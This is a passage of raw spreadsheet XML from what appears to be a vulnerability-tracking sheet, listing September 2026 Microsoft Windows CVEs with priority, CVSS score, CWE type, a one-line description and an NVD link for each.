t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69301</t></is></c></row><row r="374"><c r="A374" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B374" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C374" s="5" t="inlineStr"><is><t>CVE-2026-69322</t></is></c><c r="D374" s="5" t="n"><v>8</v></c><c r="E374" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F374" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G374" s="5" t="inlineStr" /><c r="H374" s="5" t="n"><v>0.007</v></c><c r="I374" s="5" t="inlineStr" /><c r="J374" s="5" t="inlineStr" /><c r="K374" s="5" t="inlineStr" /><c r="L374" s="5" t="inlineStr" /><c r="M374" s="5" t="inlineStr" /><c r="N374" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O374" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P374" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q374" s="5" t="inlineStr" /><c r="R374" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="S374" s="5" t="inlineStr"><is><t>Double free in Microsoft Windows Search Component allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T374" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69322</t></is></c></row><row r="375"><c r="A375" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B375" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C375" s="5" t="inlineStr"><is><t>CVE-2026-69332</t></is></c><c r="D375" s="5" t="n"><v>8</v></c><c r="E375" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F375" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G375" s="5" t="inlineStr" /><c r="H375" s="5" t="n"><v>0.007</v></c><c r="I375" s="5" t="inlineStr" /><c r="J375" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K37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75" s="5" t="inlineStr" /><c r="M375" s="5" t="inlineStr" /><c r="N375" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O375" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P375" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q375" s="5" t="inlineStr" /><c r="R375" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S375" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows NTFS allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T375" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69332</t></is></c></row><row r="376"><c r="A376" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B376" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C376" s="5" t="inlineStr"><is><t>CVE-2026-69346</t></is></c><c r="D376" s="5" t="n"><v>8</v></c><c r="E376" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F376" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G376" s="5" t="inlineStr" /><c r="H376" s="5" t="n"><v>0.007</v></c><c r="I376" s="5" t="inlineStr" /><c r="J376" s="5" t="inlineStr" /><c r="K376" s="5" t="inlineStr" /><c r="L376" s="5" t="inlineStr" /><c r="M376" s="5" t="inlineStr" /><c r="N376" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O376" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P376" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q376" s="5" t="inlineStr" /><c r="R376" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S376" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Print Spooler Components allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T376" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69346</t></is></c></row><row r="377"><c r="A377" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B377" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C377" s="5" t="inlineStr"><is><t>CVE-2026-69365</t></is></c><c r="D377" s="5" t="n"><v>8</v></c><c r="E377" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F377" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G377" s="5" t="inlineStr" /><c r="H377" s="5" t="n"><v>0.007</v></c><c r="I377" s="5" t="inlineStr" /><c r="J377" s="5" t="inlineStr" /><c r="K377" s="5" t="inlineStr" /><c r="L377" s="5" t="inlineStr" /><c r="M377" s="5" t="inlineStr" /><c r="N377" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O377" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P377" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q377" s="5" t="inlineStr" /><c r="R377" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S377" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Local Security Authority Server (lsasrv) allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T377" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69365</t></is></c></row><row r="378"><c r="A378" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B378" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C378" s="5" t="inlineStr"><is><t>CVE-2026-69371</t></is></c><c r="D378" s="5" t="n"><v>8</v></c><c r="E378" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F378" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G378" s="5" t="inlineStr" /><c r="H378" s="5" t="n"><v>0.007</v></c><c r="I378" s="5" t="inlineStr" /><c r="J378" s="5" t="inlineStr" /><c r="K378" s="5" t="inlineStr" /><c r="L378" s="5" t="inlineStr" /><c r="M378" s="5" t="inlineStr" /><c r="N378" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O378" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P378" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q378" s="5" t="inlineStr" /><c r="R378" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S378" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Overlay Filter allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T378" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69371</t></is></c></row><row r="379"><c r="A379" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B379" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C379" s="5" t="inlineStr"><is><t>CVE-2026-69412</t></is></c><c r="D379" s="5" t="n"><v>8</v></c><c r="E379" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F379" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G379" s="5" t="inlineStr" /><c r="H379" s="5" t="n"><v>0.005</v></c><c r="I379" s="5" t="inlineStr" /><c r="J379" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K379" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L379" s="5" t="inlineStr" /><c r="M379" s="5" t="inlineStr" /><c r="N379" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O379" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P379" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q379" s="5" t="inlineStr" /><c r="R379" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S379" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows DHCP Server allows an authorized attacker to execute code over an adjacent network.</t></is></c><c r="T379" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69412</t></is></c></row><row r="380"><c r="A380" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B380" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C380" s="5" t="inlineStr"><is><t>CVE-2026-69418</t></is></c><c r="D380" s="5" t="n"><v>8</v></c><c r="E380" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F380" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G380" s="5" t="inlineStr" /><c r="H380" s="5" t="n"><v>0.007</v></c><c r="I380" s="5" t="inlineStr" /><c r="J380" s="5" t="inlineStr" /><c r="K380" s="5" t="inlineStr" /><c r="L380" s="5" t="inlineStr" /><c r="M380" s="5" t="inlineStr" /><c r="N380" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O380" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P380" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q380" s="5" t="inlineStr" /><c r="R380" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S380" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Volume Manager Driver allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T380" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69418</t></is></c></row><row r="381"><c r="A381" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B381" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C381" s="5" t="inlineStr"><is><t>CVE-2026-69423</t></is></c><c r="D381" s="5" t="n"><v>8</v></c><c r="E381" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F381" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G381" s="5" t="inlineStr" /><c r="H381" s="5" t="n"><v>0.007</v></c><c r="I381" s="5" t="inlineStr" /><c r="J381" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K3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81" s="5" t="inlineStr" /><c r="M381" s="5" t="inlineStr" /><c r="N381" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O381" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P381" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q381" s="5" t="inlineStr" /><c r="R381" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S381" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows USB Video Driver allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T381" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69423</t></is></c></row><row r="382"><c r="A382" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B382" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C382" s="5" t="inlineStr"><is><t>CVE-2026-69427</t></is></c><c r="D382" s="5" t="n"><v>8</v></c><c r="E382" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F382" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G382" s="5" t="inlineStr" /><c r="H382" s="5" t="n"><v>0.007</v></c><c r="I382" s="5" t="inlineStr" /><c r="J382" s="5" t="inlineStr" /><c r="K382" s="5" t="inlineStr" /><c r="L382" s="5" t="inlineStr" /><c r="M382" s="5" t="inlineStr" /><c r="N382" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O382" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P382" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q382" s="5" t="inlineStr" /><c r="R382" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S382" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows VOLSNAP.SYS allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T382" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69427</t></is></c></row><row r="383"><c r="A383" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B383" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C383" s="5" t="inlineStr"><is><t>CVE-2026-69458</t></is></c><c r="D383" s="5" t="n"><v>8</v></c><c r="E383" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F383" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G383" s="5" t="inlineStr" /><c r="H383" s="5" t="n"><v>0.007</v></c><c r="I383" s="5" t="inlineStr" /><c r="J383" s="5" t="inlineStr" /><c r="K383" s="5" t="inlineStr" /><c r="L383" s="5" t="inlineStr" /><c r="M383" s="5" t="inlineStr" /><c r="N383" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O383" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P383" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q383" s="5" t="inlineStr" /><c r="R383" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S383" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows BitLocker allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T383" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69458</t></is></c></row><row r="384"><c r="A384" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B384" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C384" s="5" t="inlineStr"><is><t>CVE-2026-69462</t></is></c><c r="D384" s="5" t="n"><v>8</v></c><c r="E384" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F384" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G384" s="5" t="inlineStr" /><c r="H384" s="5" t="n"><v>0.007</v></c><c r="I384" s="5" t="inlineStr" /><c r="J384" s="5" t="inlineStr" /><c r="K384" s="5" t="inlineStr" /><c r="L384" s="5" t="inlineStr" /><c r="M384" s="5" t="inlineStr" /><c r="N384" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O384" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P384" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q384" s="5" t="inlineStr" /><c r="R384" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S384" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Error Reporting allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T384" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69462</t></is></c></row><row r="385"><c r="A385" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B385" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C385" s="5" t="inlineStr"><is><t>CVE-2026-69481</t></is></c><c r="D385" s="5" t="n"><v>8</v></c><c r="E385" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F385" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G385" s="5" t="inlineStr" /><c r="H385" s="5" t="n"><v>0.007</v></c><c r="I385" s="5" t="inlineStr" /><c r="J385" s="5" t="inlineStr" /><c r="K385" s="5" t="inlineStr" /><c r="L385" s="5" t="inlineStr" /><c r="M385" s="5" t="inlineStr" /><c r="N385" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O385" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P385" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q385" s="5" t="inlineStr" /><c r="R385" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S385" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Enterprise App Management allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T385" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69481</t></is></c></row><row r="386"><c r="A386" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B386" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C386" s="5" t="inlineStr"><is><t>CVE-2026-69503</t></is></c><c r="D386" s="5" t="n"><v>8</v></c><c r="E386" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F386" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G386" s="5" t="inlineStr" /><c r="H386" s="5" t="n"><v>0.008</v></c><c r="I386" s="5" t="inlineStr" /><c r="J386" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K38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386" s="5" t="inlineStr" /><c r="M386" s="5" t="inlineStr" /><c r="N386" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O386" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P386" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q386" s="5" t="inlineStr" /><c r="R386" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S386" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows USB Driver allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T386" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69503</t></is></c></row><row r="387"><c r="A387" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B387" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C387" s="5" t="inlineStr"><is><t>CVE-2026-69505</t></is></c><c r="D387" s="5" t="n"><v>8</v></c><c r="E387" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F387" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G387" s="5" t="inlineStr" /><c r="H387" s="5" t="n"><v>0.008</v></c><c r="I387" s="5" t="inlineStr" /><c r="J387" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K3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87" s="5" t="inlineStr" /><c r="M387" s="5" t="inlineStr" /><c r="N387" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O387" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P387" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q387" s="5" t="inlineStr" /><c r="R387" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S387" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows NTFS allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T387" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69505</t></is></c></row><row r="388"><c r="A388" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B388" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C388" s="5" t="inlineStr"><is><t>CVE-2026-69512</t></is></c><c r="D388" s="5" t="n"><v>8</v></c><c r="E388" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F388" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G388" s="5" t="inlineStr" /><c r="H388" s="5" t="n"><v>0.008</v></c><c r="I388" s="5" t="inlineStr" /><c r="J388" s="5" t="inlineStr" /><c r="K388" s="5" t="inlineStr" /><c r="L388" s="5" t="inlineStr" /><c r="M388" s="5" t="inlineStr" /><c r="N388" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O388" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P388" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q388" s="5" t="inlineStr" /><c r="R388" s="5" t="inlineStr"><is><t>CWE-122, CWE-197</t></is></c><c r="S388" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Spaceport.sys allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T388" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69512</t></is></c></row><row r="389"><c r="A389" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B389" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C389" s="5" t="inlineStr"><is><t>CVE-2026-69619</t></is></c><c r="D389" s="5" t="n"><v>8</v></c><c r="E389" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F389" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G389" s="5" t="inlineStr" /><c r="H389" s="5" t="n"><v>0.008</v></c><c r="I389" s="5" t="inlineStr" /><c r="J389" s="5" t="inlineStr" /><c r="K389" s="5" t="inlineStr" /><c r="L389" s="5" t="inlineStr" /><c r="M389" s="5" t="inlineStr" /><c r="N389" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O389" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P389" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q389" s="5" t="inlineStr" /><c r="R389" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S389" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows exFAT File System allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T389" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69619</t></is></c></row><row r="390"><c r="A390" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B390" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C390" s="5" t="inlineStr"><is><t>CVE-2026-69623</t></is></c><c r="D390" s="5" t="n"><v>8</v></c><c r="E390" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F390" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G390" s="5" t="inlineStr" /><c r="H390" s="5" t="n"><v>0.008999999999999999</v></c><c r="I390" s="5" t="inlineStr" /><c r="J390" s="5" t="inlineStr" /><c r="K390" s="5" t="inlineStr" /><c r="L390" s="5" t="inlineStr" /><c r="M390" s="5" t="inlineStr" /><c r="N390" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O390" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P390" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q390" s="5" t="inlineStr" /><c r="R390" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S390" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="T390" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69623</t></is></c></row><row r="391"><c r="A391" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B391" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C391" s="5" t="inlineStr"><is><t>CVE-2026-69625</t></is></c><c r="D391" s="5" t="n"><v>8</v></c><c r="E391" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F391" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G391" s="5" t="inlineStr" /><c r="H391" s="5" t="n"><v>0.007</v></c><c r="I391" s="5" t="inlineStr" /><c r="J391" s="5" t="inlineStr" /><c r="K391" s="5" t="inlineStr" /><c r="L391" s="5" t="inlineStr" /><c r="M391" s="5" t="inlineStr" /><c r="N391" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O391" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P391" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q391" s="5" t="inlineStr" /><c r="R391" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S391" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="T391" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69625</t></is></c></row><row r="392"><c r="A392" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B392" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C392" s="5" t="inlineStr"><is><t>CVE-2026-69643</t></is></c><c r="D392" s="5" t="n"><v>8</v></c><c r="E392" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F392" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G392" s="5" t="inlineStr" /><c r="H392" s="5" t="n"><v>0.008</v></c><c r="I392" s="5" t="inlineStr" /><c r="J392" s="5" t="inlineStr" /><c r="K392" s="5" t="inlineStr" /><c r="L392" s="5" t="inlineStr" /><c r="M392" s="5" t="inlineStr" /><c r="N392" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O392" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P392" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q392" s="5" t="inlineStr" /><c r="R392" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S392" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Spaceport.sys allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T392" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69643</t></is></c></row><row r="393"><c r="A393" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B393" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C393" s="5" t="inlineStr"><is><t>CVE-2026-69681</t></is></c><c r="D393" s="5" t="n"><v>8</v></c><c r="E393" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F393" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G393" s="5" t="inlineStr" /><c r="H393" s="5" t="n"><v>0.008</v></c><c r="I393" s="5" t="inlineStr" /><c r="J393" s="5" t="inlineStr" /><c r="K393" s="5" t="inlineStr" /><c r="L393" s="5" t="inlineStr" /><c r="M393" s="5" t="inlineStr" /><c r="N393" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O393" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P393" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q393" s="5" t="inlineStr" /><c r="R393" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S393" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Virtual Hard Disk (VHD) Miniport Driver allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T393" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69681</t></is></c></row><row r="394"><c r="A394" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B394" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C394" s="5" t="inlineStr"><is><t>CVE-2026-69689</t></is></c><c r="D394" s="5" t="n"><v>8</v></c><c r="E394" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F394" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G394" s="5" t="inlineStr" /><c r="H394" s="5" t="n"><v>0.008</v></c><c r="I394" s="5" t="inlineStr" /><c r="J394" s="5" t="inlineStr" /><c r="K394" s="5" t="inlineStr" /><c r="L394" s="5" t="inlineStr" /><c r="M394" s="5" t="inlineStr" /><c r="N394" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O394" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P394" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q394" s="5" t="inlineStr" /><c r="R394" s="5" t="inlineStr"><is><t>CWE-121, CWE-125</t></is></c><c r="S394" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Win32K allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T394" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69689</t></is></c></row><row r="395"><c r="A395" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B395" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C395" s="5" t="inlineStr"><is><t>CVE-2026-69714</t></is></c><c r="D395" s="5" t="n"><v>8</v></c><c r="E395" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F395" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G395" s="5" t="inlineStr" /><c r="H395" s="5" t="n"><v>0.008</v></c><c r="I395" s="5" t="inlineStr" /><c r="J395" s="5" t="inlineStr" /><c r="K395" s="5" t="inlineStr" /><c r="L395" s="5" t="inlineStr" /><c r="M395" s="5" t="inlineStr" /><c r="N395" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O395" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P395" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q395" s="5" t="inlineStr" /><c r="R395" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S395" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows Device Association Service allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T395" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69714</t></is></c></row><row r="396"><c r="A396" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B396" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C396" s="5" t="inlineStr"><is><t>CVE-2026-69717</t></is></c><c r="D396" s="5" t="n"><v>8</v></c><c r="E396" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F396" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G396" s="5" t="inlineStr" /><c r="H396" s="5" t="n"><v>0.007</v></c><c r="I396" s="5" t="inlineStr" /><c r="J396" s="5" t="inlineStr" /><c r="K396" s="5" t="inlineStr" /><c r="L396" s="5" t="inlineStr" /><c r="M396" s="5" t="inlineStr" /><c r="N396" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O396" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P396" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q396" s="5" t="inlineStr" /><c r="R396" s="5" t="inlineStr"><is><t>CWE-125, CWE-822, CWE-843</t></is></c><c r="S396" s="5" t="inlineStr"><is><t>Untrusted pointer dereference in Windows Group Policy allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T396" s="6" 